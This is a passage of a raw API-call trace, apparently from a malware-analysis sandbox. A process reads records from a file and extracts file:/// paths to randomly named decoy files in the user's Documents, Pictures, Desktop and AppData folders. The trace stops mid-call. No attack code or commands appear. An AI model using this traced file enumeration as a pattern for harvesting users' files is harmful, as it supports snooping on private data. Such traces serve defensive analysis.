ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.760] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.760] SetFilePointer (in: hFile=0x9c, lDistanceToMove=41216, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa100 [0085.760] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.760] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/dxIxxJ.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif" [0085.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif") returned 64 [0085.760] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.760] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.760] SetFilePointer (in: hFile=0x9c, lDistanceToMove=41472, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa200 [0085.760] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.760] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/4-PA3_vg9kycz2Coo.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf" [0085.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf") returned 64 [0085.760] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.760] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.761] SetFilePointer (in: hFile=0x9c, lDistanceToMove=41728, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa300 [0085.761] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.761] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/HKofn.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf" [0085.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf") returned 93 [0085.761] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.761] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.765] SetFilePointer (in: hFile=0x9c, lDistanceToMove=41984, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa400 [0085.765] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.765] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/J-fqX8Oz1.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv" [0085.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv") returned 65 [0085.765] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.765] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.765] SetFilePointer (in: hFile=0x9c, lDistanceToMove=42240, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa500 [0085.766] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.766] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/8ep2ZUetsNPLh6GpU01.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots" [0085.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots") returned 107 [0085.766] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.766] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.766] SetFilePointer (in: hFile=0x9c, lDistanceToMove=42496, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa600 [0085.766] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.766] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/QU7QixvGBkO.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf" [0085.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf") returned 67 [0085.766] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.766] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.766] SetFilePointer (in: hFile=0x9c, lDistanceToMove=42752, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa700 [0085.766] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.766] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/9WZlbbOC.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx" [0085.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx") returned 59 [0085.766] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.766] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.766] SetFilePointer (in: hFile=0x9c, lDistanceToMove=43008, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa800 [0085.766] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.766] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/vw6XLs.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx" [0085.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx") returned 57 [0085.767] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.767] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.767] SetFilePointer (in: hFile=0x9c, lDistanceToMove=43264, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa900 [0085.767] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.767] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/KQayysRUiMUhUr.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif" [0085.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif") returned 72 [0085.767] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.767] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.767] SetFilePointer (in: hFile=0x9c, lDistanceToMove=43520, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaa00 [0085.767] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.767] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/XCrdCV/ImjMUnevaLJ.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp" [0085.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/imjmunevalj.bmp") returned 93 [0085.767] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.767] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.767] SetFilePointer (in: hFile=0x9c, lDistanceToMove=43776, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xab00 [0085.767] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.767] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/bQiP4GzdRig20X.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png" [0085.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/bqip4gzdrig20x.png") returned 70 [0085.768] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.768] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.768] SetFilePointer (in: hFile=0x9c, lDistanceToMove=44032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xac00 [0085.768] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.768] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/GvvpRgS0C.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png" [0085.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned 57 [0085.768] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.768] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.768] SetFilePointer (in: hFile=0x9c, lDistanceToMove=44288, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xad00 [0085.768] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.768] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/zQr7eXBiOKJx.mkv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv" [0085.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned 59 [0085.768] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.768] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.768] SetFilePointer (in: hFile=0x9c, lDistanceToMove=44544, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xae00 [0085.768] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.768] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/MIK5.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx" [0085.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned 70 [0085.768] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.768] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.768] SetFilePointer (in: hFile=0x9c, lDistanceToMove=44800, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaf00 [0085.768] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.769] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/RNVH3h9CK0e39pnQ.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf" [0085.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned 104 [0085.769] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.769] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.769] SetFilePointer (in: hFile=0x9c, lDistanceToMove=45056, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb000 [0085.769] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.769] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/olV5jdB-fFDIfmWqcS.docx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx" [0085.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned 69 [0085.769] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.769] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.769] SetFilePointer (in: hFile=0x9c, lDistanceToMove=45312, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb100 [0085.769] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.769] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/KpUzFgCFS9U.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf" [0085.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned 76 [0085.769] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.769] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.769] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.769] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/VWKCvzfj9FEO9nNP/7ULx.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg" [0085.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned 69 [0085.769] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.770] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.770] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.770] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/v8zjPd1uV_.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp" [0085.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned 59 [0085.770] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.770] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.770] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.770] _strlwr (in: 